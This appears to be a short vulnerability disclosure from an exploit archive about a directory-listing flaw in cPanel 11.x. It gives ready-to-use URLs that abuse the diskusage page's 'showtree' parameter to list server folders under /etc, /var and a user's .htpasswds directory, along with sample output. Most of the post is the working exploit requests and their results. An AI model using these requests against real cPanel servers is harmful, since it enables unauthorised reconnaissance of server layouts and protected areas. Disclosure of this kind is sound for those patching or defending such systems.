cPanel version 11.x suffers from a vulnerability that allows the viewing of directories and folders.
cfb253097b56d5128a8b680019c8adb03ff0983a2b104dbc3b26aef8f78255ec
Hello
I Discovered a new bug to show the directions ( Folders Only ) on the server
for example , i tried to see the folders in /etc
and it worked !
Exploit :
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/etc
now you will see the folders only which is inside /etc
exapmle :
Directory Space Used
etc/Pegasus 0.00 Meg
etc/X11 0.07 Meg
etc/X11/applnk 0.00 Meg
etc/X11/fs 0.00 Meg
etc/X11/serverconfig 0.00 Meg
etc/X11/starthere 0.03 Meg
etc/X11/sysconfig 0.00 Meg
...etc
other example to see the folders in /var :
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var
that will shows you folders inside /var , like :
var/www/cgi-bin 0.00 Meg
var/www/error 0.19 Meg
var/www/error/include 0.01 Meg
var/www/html 0.00 Meg
var/www/icons 0.89 Meg
var/www/icons/small 0.25 Meg
var/yp 0.02 Meg
var/yp/binding 0.00 Meg
...etc
another example, you can see the folders which is been protected by firewall
for example if you type :
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds
u will see all the folders which got firewall
like :
home/user/.htpasswds/public_html 0.01 Meg
home/user/.htpasswds/public_html/admin 0.00 Meg
home/user/.htpasswds/public_html/admin/login 0.00 Meg
tested on / cPanel version 11.18.3
Discovered By Linux_Drox
Best Regards
L-G-H TEAM
LeZr.Com